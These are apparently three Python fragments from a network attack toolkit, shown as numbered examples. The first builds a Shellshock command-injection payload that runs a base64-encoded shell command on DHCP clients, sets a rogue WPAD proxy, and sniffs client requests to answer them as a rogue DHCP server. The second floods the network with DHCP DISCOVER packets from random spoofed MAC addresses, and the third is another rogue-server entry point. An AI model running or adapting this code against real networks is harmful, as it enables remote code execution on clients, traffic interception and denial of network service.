payload = b64encode(payload)
                        shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"

                if shellshock_url is not None:
                    if len(shellshock_url) > 255:
                        print "[ERROR] Len of command is very big! Current len: " + str(len(shellshock_url))
                        shellshock_url = "A"

                global proxy
                if args.proxy is None:
                    proxy = bytes("http://" + dhcp_server_ip_address + ":8080/wpad.dat")
                else:
                    proxy = bytes(args.proxy)

                ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip)
                sendp(ack_packet, iface=current_network_interface, verbose=False)
                print "[INFO] Send ack response!"

if __name__ == "__main__":
    # Script entry point: capture DHCP client-to-server datagrams (UDP source
    # port 68, destination port 67) on current_network_interface and pass each
    # accepted frame to dhcp_reply, which is defined outside this block.
    # NOTE(review): judging by the fragment above, dhcp_reply answers the
    # captured requests itself; answers from a host that is not the
    # authorised DHCP server are what DHCP snooping on access switches is
    # meant to drop -- confirm against the full file.
    if args.target_mac is not None:
        # One client was named on the command line: keep only frames whose
        # Ethernet source address equals that MAC, broadcast or unicast.
        print("Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac + " ...")
        sniff(
            iface=current_network_interface,
            filter="udp and src port 68 and dst port 67",
            lfilter=lambda d: d.src == args.target_mac,
            prn=dhcp_reply,
        )
    else:
        # No client named: take broadcast requests only, and skip frames whose
        # source MAC equals eth.get_mac_for_dhcp_discover() or the MAC reported
        # for the local interface (presumably this host's own traffic).
        print("Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM ...")
        sniff(
            iface=current_network_interface,
            filter="udp and src port 68 and dst port 67 and dst host 255.255.255.255",
            lfilter=lambda d: (d.src != eth.get_mac_for_dhcp_discover() and
                               d.src != Base.get_netiface_mac_address(current_network_interface)),
            prn=dhcp_reply,
        )
Beispiel #2
    count_percent = 0

    print "Creating packets..."

    if args.notspoofmac:
        print " Your MAC address is not spoofed!"

    eth = Ethernet_raw()
    dhcp = DHCP_raw()

    while count < count_max:

        if args.notspoofmac:
            SRC_MAC = current_mac_address
        else:
            SRC_MAC = eth.get_mac_for_dhcp_discover()

        CLIENT_MAC = eth.get_random_mac()
        HOST_NAME = Base.make_random_string(8)

        current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC,
                                                   HOST_NAME)
        PACKETS.append(current_packet)

        count += 1
        if count > count_percent:
            stdout.flush()
            stdout.write(" Complete: " + str(index_percent + 1) + "%   \r")
            index_percent += 1
            count_percent = (count_max / 100) * index_percent
Beispiel #3

if __name__ == "__main__":
    # Script entry point. Picks one of three capture modes from the
    # --target_ip / --target_mac arguments; every accepted frame is handed to
    # dhcp_reply, which is defined outside this block.
    if args.target_ip is not None and args.target_mac is None:
        # A target IP is only accepted together with a target MAC.
        print(Base.c_error + "Please set target MAC address (--target_mac 00:AA:BB:CC:DD:FF)")
        exit(1)
    elif args.target_ip is not None:
        # Target IP and MAC both given: besides DHCP client traffic
        # (UDP 68 -> 67) the capture filter also admits ARP frames, and only
        # frames sent from the target MAC are processed.
        print(Base.c_info + "Waiting for ARP, DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac)
        sniff(
            iface=current_network_interface,
            filter="arp or (udp and src port 68 and dst port 67)",
            lfilter=lambda d: d.src == args.target_mac,
            prn=dhcp_reply,
        )
    elif args.target_mac is None:
        # No target at all: broadcast DHCP client requests only, skipping
        # frames whose source MAC equals eth.get_mac_for_dhcp_discover() or
        # the MAC reported for the local interface (presumably this host's
        # own traffic).
        print(Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM")
        sniff(
            iface=current_network_interface,
            filter="udp and src port 68 and dst port 67 and dst host 255.255.255.255",
            lfilter=lambda d: (d.src != eth.get_mac_for_dhcp_discover() and
                               d.src != Base.get_netiface_mac_address(current_network_interface)),
            prn=dhcp_reply,
        )
    else:
        # Target MAC only: DHCP client traffic from that MAC, broadcast or
        # unicast.
        print(Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac)
        sniff(
            iface=current_network_interface,
            filter="udp and src port 68 and dst port 67",
            lfilter=lambda d: d.src == args.target_mac,
            prn=dhcp_reply,
        )